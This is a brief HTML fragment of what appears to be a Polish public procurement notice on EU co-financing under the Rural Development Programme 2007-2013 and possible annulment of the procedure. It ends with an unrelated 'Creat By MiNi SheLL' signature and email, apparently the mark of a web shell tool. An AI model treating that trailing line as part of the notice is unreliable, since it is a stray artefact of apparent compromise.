<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com